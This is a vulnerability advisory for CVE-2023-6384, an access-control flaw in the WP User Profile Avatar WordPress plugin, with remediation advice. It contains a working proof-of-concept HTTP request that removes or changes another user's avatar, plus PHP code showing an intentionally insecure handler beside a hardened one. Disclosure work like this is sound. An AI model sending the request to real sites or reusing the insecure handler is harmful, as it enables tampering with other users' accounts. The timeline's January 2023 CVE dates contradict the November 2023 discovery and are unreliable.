During a comprehensive assessment of the WP User Profile Avatar plugin, a significant vulnerability was identified, namely Insecure Direct Object Reference (IDOR). This flaw allows unauthorized users to delete or alter someone else’s avatar without the necessary privileges.
Main info:

| Field | Value |
|---|---|
| CVE | CVE-2023-6384 |
| Plugin | WP User Profile Avatar < 1.0.1 |
| Severity | Medium |
| All Time | 50 162 |
| Active installations | 10 000+ |
| Publicly Published | January 4, 2023 |
| Last Updated | January 4, 2023 |
| Researcher | Dmitrii Ignatyev |
| OWASP TOP-10 | A5: Broken Access Control |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6384 https://wpscan.com/vulnerability/fbdefab4-614b-493b-a9ae-c5aeff8323ef/ |
| Plugin Security Certification by CleanTalk | |
Timeline

| Date | Event |
|---|---|
| November 6, 2023 | Plugin testing and vulnerability detection in the WP User Profile Avatar plugin have been completed |
| November 6, 2023 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| December 25, 2023 | The author fixed the vulnerability and released the plugin update |
| January 3, 2023 | Registered CVE-2023-6384 |
Discovery of the Vulnerability
In the process of testing the plugin, a vulnerability was found that allows a user to delete or change someone else's avatar without the necessary privileges.
Understanding IDOR attacks
In WordPress, IDOR occurs when an application provides direct access to objects based on user-supplied input, such as URLs or form parameters. In this context, it means that the plugin does not properly check whether the user making the request has the authority to perform actions on someone else’s avatar. Real-world examples include an attacker manipulating the avatar ID in the request URL to access and modify avatars belonging to other users.
Exploiting the IDOR Vulnerability
To exploit this IDOR vulnerability, an attacker can manipulate the avatar ID in the request, enabling them to target and modify avatars associated with other users. This manipulation could involve changing avatars to inappropriate content, causing reputational harm, or deleting avatars to disrupt the user experience.
PoC request:

```http
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: your_site
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------49182745140183315063494246849
Content-Length: 472
Origin: http://your_site
DNT: 1
Connection: close
Referer: http://your_site/wordpress/?p=873
Cookie: wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=1%7C1699414980%7CyeHq6S6Ycak8JS53S82IfXyC91VGKkxL57fd6Vv4sFA%7C882ae66f7e5369755c66cd9a37b12ea93849faebf221f391f6dca1b56fd21b4d; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=1%7C1699414980%7CyeHq6S6Ycak8JS53S82IfXyC91VGKkxL57fd6Vv4sFA%7Ce163e2d4c1042710f9b0e475c500335e17ced7d7e00dfe867bf8af68d95e1e6b; wp-settings-2=libraryContent%3Dbrowse%26hidetb%3D0%26editor%3Dtinymce; wp-settings-time-2=1699242180
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------49182745140183315063494246849
Content-Disposition: form-data; name="action"

remove_user_avatar # here you can add update_user_avatar and change avatar of user by id from AUTHOR account
-----------------------------49182745140183315063494246849
Content-Disposition: form-data; name="form_data"

wpupa_url=&wpupa_attachment_id=875&user_id=1
-----------------------------49182745140183315063494246849
Content-Disposition: form-data; name="security"

3f855e1991
-----------------------------49182745140183315063494246849--
```
___
The potential risk associated with this IDOR vulnerability is significant. In real-world scenarios, attackers could leverage this vulnerability to perform malicious actions, including but not limited to:
- Changing avatars to offensive or harmful content.
- Deleting avatars to disrupt user experience.
- Tampering with avatars to impersonate other users.
Recommendations for Improved Security
- Access Controls: Implement robust access controls to ensure that users can only modify or delete their avatars and not those of other users.
- Input Validation: Validate and sanitize user inputs to prevent manipulation of parameters like avatar IDs.
- Logging and Monitoring: Implement logging mechanisms to track changes to avatars and regularly monitor these logs for any suspicious activities.
- Regular Audits: Conduct regular security audits to identify and address vulnerabilities within WordPress plugins.
- Educate Users: Educate users about the importance of securing their accounts and the potential risks associated with unauthorized access to avatars.
By adhering to these recommendations, WordPress administrators can significantly reduce the risk of IDOR-related attacks, protecting user avatars and maintaining a more secure environment for their website.
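The root cause described above is that the AJAX handler accepts a user_id from the request body and acts on it after only a nonce check, which proves the request came from a logged-in session but says nothing about whether that session may touch the target user. The following is an added illustrative example, not the plugin's own code: a WordPress admin-ajax handler in the insecure shape the advisory describes, followed by a hardened version that resolves the target user from the caller and requires a capability on that object, validates the attachment being assigned, and logs both denials and successful changes. The user-meta key `wpupa_avatar_id` and the nonce action name `wpupa_nonce` are assumptions; the action names and form_data parameters match the PoC request.

```php
<?php
/**
 * Added illustrative example (not the plugin's own code): an admin-ajax
 * handler for the "remove_user_avatar" action in the insecure shape the
 * advisory describes, then hardened handlers for both actions.
 *
 * Assumptions (not taken from the advisory): the avatar attachment id is
 * stored in user meta under the hypothetical key 'wpupa_avatar_id', and the
 * nonce action name 'wpupa_nonce' is hypothetical as well.
 */

// --- Insecure shape: the nonce only proves a logged-in session made the
// --- request; nothing ties the supplied user_id to the caller.
function wpupa_remove_avatar_insecure() {
    check_ajax_referer( 'wpupa_nonce', 'security' ); // CSRF check, not authorisation

    $data = array();
    parse_str( wp_unslash( $_POST['form_data'] ?? '' ), $data ); // e.g. "wpupa_url=&wpupa_attachment_id=875&user_id=1"
    $user_id = absint( $data['user_id'] ?? 0 );

    delete_user_meta( $user_id, 'wpupa_avatar_id' ); // IDOR: any user_id is accepted
    wp_send_json_success();
}

// --- Hardened shape: authorise on the target object, not just on the session.
function wpupa_resolve_target_user( array $data ) {
    $current = get_current_user_id();
    if ( ! $current ) {
        return new WP_Error( 'not_logged_in', 'Login required.', array( 'status' => 401 ) );
    }

    // Default to the caller; honour a different id only if the caller may edit that user.
    $target = isset( $data['user_id'] ) ? absint( $data['user_id'] ) : $current;
    if ( $target !== $current && ! current_user_can( 'edit_user', $target ) ) {
        error_log( sprintf( 'wpupa: user %d denied avatar change on user %d', $current, $target ) );
        return new WP_Error( 'forbidden', 'You may only change your own avatar.', array( 'status' => 403 ) );
    }
    return $target;
}

function wpupa_remove_avatar_secure() {
    check_ajax_referer( 'wpupa_nonce', 'security' );

    $data = array();
    parse_str( wp_unslash( $_POST['form_data'] ?? '' ), $data );

    $target = wpupa_resolve_target_user( $data );
    if ( is_wp_error( $target ) ) {
        wp_send_json_error( $target->get_error_message(), $target->get_error_data()['status'] );
    }

    delete_user_meta( $target, 'wpupa_avatar_id' );
    error_log( sprintf( 'wpupa: user %d removed avatar of user %d', get_current_user_id(), $target ) );
    wp_send_json_success();
}

function wpupa_update_avatar_secure() {
    check_ajax_referer( 'wpupa_nonce', 'security' );

    $data = array();
    parse_str( wp_unslash( $_POST['form_data'] ?? '' ), $data );

    $target = wpupa_resolve_target_user( $data );
    if ( is_wp_error( $target ) ) {
        wp_send_json_error( $target->get_error_message(), $target->get_error_data()['status'] );
    }

    // Validate the object being attached: it must be an image attachment the
    // caller is allowed to edit (edit_post on an attachment id resolves to
    // edit_posts / edit_others_posts depending on who uploaded it).
    $attachment_id = absint( $data['wpupa_attachment_id'] ?? 0 );
    $attachment    = get_post( $attachment_id );
    if ( ! $attachment || 'attachment' !== $attachment->post_type || ! wp_attachment_is_image( $attachment_id ) ) {
        wp_send_json_error( 'Invalid attachment.', 400 );
    }
    if ( ! current_user_can( 'edit_post', $attachment_id ) ) {
        wp_send_json_error( 'You may only use media you are allowed to edit.', 403 );
    }

    update_user_meta( $target, 'wpupa_avatar_id', $attachment_id );
    error_log( sprintf( 'wpupa: user %d set avatar %d on user %d', get_current_user_id(), $attachment_id, $target ) );
    wp_send_json_success( array( 'attachment_id' => $attachment_id ) );
}

// Register only the hardened handlers on the authenticated hook, so
// logged-out callers never reach them.
add_action( 'wp_ajax_remove_user_avatar', 'wpupa_remove_avatar_secure' );
add_action( 'wp_ajax_update_user_avatar', 'wpupa_update_avatar_secure' );
```

With the hardened handlers, the PoC request from an Author account with `user_id=1` is answered with HTTP 403 and a log line naming both the caller and the target, which is the signal the logging recommendation above asks administrators to watch for.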
DMITRII I.